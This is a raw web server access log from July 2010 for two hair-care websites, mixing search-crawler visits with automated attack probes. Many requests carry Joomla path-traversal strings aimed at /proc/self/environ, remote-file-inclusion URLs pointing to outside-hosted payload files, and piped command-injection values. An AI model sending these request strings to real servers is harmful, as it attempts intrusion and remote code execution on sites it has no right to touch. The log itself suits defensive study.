66.182.192.48 - - [12/Jul/2010:01:13:18 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:01:17:11 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
88.131.106.1 - - [12/Jul/2010:01:20:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.freehairsecrets.com"
88.131.106.5 - - [12/Jul/2010:01:20:08 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:20:55 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
94.136.63.119 - - [12/Jul/2010:01:22:22 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:01:22:22 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:01:22:22 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:01:22:23 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.136.63.119 - - [12/Jul/2010:01:22:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.136.63.119 - - [12/Jul/2010:01:22:23 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
67.195.114.60 - - [12/Jul/2010:01:26:34 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:28:44 -0700] "GET /logs/access.log///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:28:44 -0700] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:28:44 -0700] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:01:31:03 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
94.136.63.119 - - [12/Jul/2010:01:31:16 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
66.182.192.48 - - [12/Jul/2010:01:34:35 -0700] "GET /logs/access_100628.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
66.182.192.48 - - [12/Jul/2010:01:34:35 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
66.182.192.48 - - [12/Jul/2010:01:34:35 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:01:39:50 -0700] "GET /logs/access_090803.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
66.182.192.48 - - [12/Jul/2010:01:39:57 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
66.182.192.48 - - [12/Jul/2010:01:39:57 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
66.182.192.48 - - [12/Jul/2010:01:39:57 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:41:55 -0700] "GET /logs/access.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:41:55 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:41:55 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:01:44:22 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
91.214.44.59 - - [12/Jul/2010:01:44:47 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:04 -0700] "GET /logs/access_100322.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:04 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:04 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:04 -0700] "GET /logs/access_100322.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.97.124.201 - - [12/Jul/2010:01:47:05 -0700] "GET /index.php/web2?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.80.209.57 - - [12/Jul/2010:01:47:38 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:38 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:38 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:57 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.80.209.57 - - [12/Jul/2010:01:47:57 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.214.192.30 - - [12/Jul/2010:01:54:10 -0700] "GET /logs/access.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:54:10 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
88.214.192.30 - - [12/Jul/2010:01:54:10 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:01:57:46 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:02:06:18 -0700] "GET /logs/access_100705.log HTTP/1.0" 200 4124259 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:02:06:52 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:02:08:48 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:02:09:11 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:02:11:45 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
151.97.124.201 - - [12/Jul/2010:02:12:52 -0700] "GET /logs/access.log//index.php/web2?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [12/Jul/2010:02:12:52 -0700] "GET /index.php/web2?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
151.97.124.201 - - [12/Jul/2010:02:12:52 -0700] "GET /logs//index.php/web2?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:23:07 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:23:07 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:23:07 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:23:08 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:23:08 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:23:08 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:25:13 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:25:13 -0700] "GET /logs/access_100705.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:25:13 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:25:13 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:25:13 -0700] "GET /logs/access_100705.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:25:14 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:02:25:43 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:29:24 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:29:24 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:29:24 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:29:25 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:29:25 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:29:25 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:30:59 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:30:59 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:30:59 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:31:00 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:31:00 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:31:00 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "www.freehairsecrets.com"
91.214.44.59 - - [12/Jul/2010:02:38:57 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:02:40:11 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
67.195.114.60 - - [12/Jul/2010:02:44:32 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
211.206.120.196 - - [12/Jul/2010:02:49:24 -0700] "GET /?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:49:24 -0700] "GET /logs/access_100705.log/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:49:24 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.weiterbildungsverbund-sh.de/joomla/page/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:49:24 -0700] "GET /?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 926 "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:49:24 -0700] "GET /logs/access_100705.log/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
211.206.120.196 - - [12/Jul/2010:02:49:25 -0700] "GET /logs/?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 200 4799 "-" "MaMa CaSpEr" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:02:54:45 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
74.52.245.146 - - [12/Jul/2010:02:59:16 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:03:08:43 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:03:15:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
216.129.119.47 - - [12/Jul/2010:03:17:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:03:21:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:21:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
194.109.22.118 - - [12/Jul/2010:03:28:36 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
194.109.22.118 - - [12/Jul/2010:03:35:21 -0700] "GET /logs/access_100614.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
194.109.22.118 - - [12/Jul/2010:03:35:22 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
194.109.22.118 - - [12/Jul/2010:03:35:22 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.816" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:03:38:50 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:03:40:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14973 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:40:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12062 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:40:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12874 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:40:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13796 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:40:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15741 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
